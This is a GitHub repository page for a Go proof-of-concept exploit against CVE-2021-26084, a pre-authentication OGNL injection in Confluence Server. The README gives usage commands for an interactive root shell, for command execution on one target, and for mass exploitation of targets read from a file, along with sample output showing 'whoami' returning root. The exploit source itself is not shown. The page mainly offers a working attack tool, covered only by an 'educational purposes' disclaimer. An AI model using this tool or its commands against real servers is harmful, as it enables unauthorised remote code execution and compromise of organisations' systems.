Skip to content
/ CVE-2021-26084 Public

CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)

8 stars 6 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

taythebot/CVE-2021-26084

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
.gitignore
.gitignore
 
 
README.md
README.md
 
 
exploit.go
exploit.go
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 

Repository files navigation

CVE-2021-26084

Proof of concept for CVE-2021-26084.

Confluence Server Webwork OGNL injection (Pre-Auth RCE)

Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

Command Limiations

Due to the payload, it is not possible to pass some characters. The list below is what I've found during my testing.

  • Double quotations "
  • Vertical bar |

Interactive Shell

 go run exploit.go -t <target> -i

Example

root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
  • Only works on a single target
  • Type exit to exit the interactive shell
  • Notice shows if possible Windows machine

Single Target

go run exploit.go -t <target> -c <command>

Multiple Targets

go run exploit.go -f <file> -c <command>

Build

go mod download
go build exploit.go

About

CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)

Resources

Readme
Activity

Stars

8 stars

Watchers

3 watching

Forks

6 forks
Report repository

Languages